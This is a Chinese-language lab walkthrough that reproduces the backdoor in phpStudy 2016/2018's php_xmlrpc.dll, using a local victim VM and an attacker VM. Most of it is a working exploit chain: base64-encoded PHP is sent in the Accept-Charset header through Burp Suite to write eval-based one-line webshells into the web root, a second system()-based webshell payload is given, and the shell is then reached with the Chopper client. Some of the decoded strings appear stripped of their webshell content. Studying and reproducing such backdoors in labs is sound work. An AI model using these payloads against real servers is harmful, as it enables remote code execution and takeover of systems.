漏洞简介
关于phpStudy的后门漏洞可参考
phpStudy在下列文件中存在后门
phpStudy2016php\php-5.2.17\ext\php_xmlrpc.dllphp\php-5.4.45\ext\php_xmlrpc.dllphpStudy2018PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dllPHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll
测试环境的搭建
环境
- vmware workstation14
- win7网站(ip 192.168.43.196)
- win10攻击者(ip 192.168.43.253)
- burpsuite
- phpstudy2018
安装phpstudy2018
phpstudy2018 安装包下载地址
安装过程不讲安装成功后访问http://192.168.43.196
使用notepad++打开 C:\PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll,检索eval,如下图所示,说明存在后门
后门的利用
通过burpsuite抓包,客户端可以通过HTTP头部的Accept-Charset字段来向后台提交命令
写入shellcode
In [15]: def b64encode(a): ...: print(base64.b64encode(a.encode('utf-8')))In [30]: b64encode(r"""$f =fopen("C:\phpStudy\PHPTutorial\WWW\x.php","w");fwrite($f," "); fclose($f);""")b'JGYgPWZvcGVuKCJDOlxwaHBTdHVkeVxQSFBUdXRvcmlhbFxXV1dceC5waHAiLCJ3Iik7ZndyaXRlKCRmLCI8P3BocCBAZXZhbChcJF9QT1NUWydjbWQnXSk7ID8+Iik7ZmNsb3NlKCRmKTs='
使用burpsuiter repeater模块写入webshell,HTTP头部如下
GET / HTTP/1.1Host: 192.168.43.196User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Charset: JGYgPWZvcGVuKCJDOlxwaHBTdHVkeVxQSFBUdXRvcmlhbFxXV1dceC5waHAiLCJ3Iik7ZndyaXRlKCRmLCI8P3BocCBAZXZhbChcJF9QT1NUWydjbWQnXSk7ID8+Iik7ZmNsb3NlKCRmKTs=Accept-Encoding: gzip,deflateConnection: closeUpgrade-Insecure-Requests: 1Content-Length: 2
两个一句话木马
atob('c3lzdGVtKCdlY2hvIF48P3BocCBAZXZhbCgkX1BPU1RbInNoZWxsIl0pP14+PlBIUFR1dG9yaWFsXFdXV1xzaGVsbC5waHAnKTs=')"system('echo ^ >PHPTutorial\\WWW\\shell.php');"atob('JGYgPWZvcGVuKCJDOlxwaHBTdHVkeVxQSFBUdXRvcmlhbFxXV1dceC5waHAiLCJ3Iik7ZndyaXRlKCRmLCI8P3BocCBAZXZhbChcJF9QT1NUWydjbWQnXSk7ID8+Iik7ZmNsb3NlKCRmKTs=')"$f =fopen(\"C:\\phpStudy\\PHPTutorial\\WWW\\x.php\",\"w\");fwrite($f,\" \");fclose($f);"
使用菜刀连接
参考资料
- Phpstudy漏洞复现利用
- poc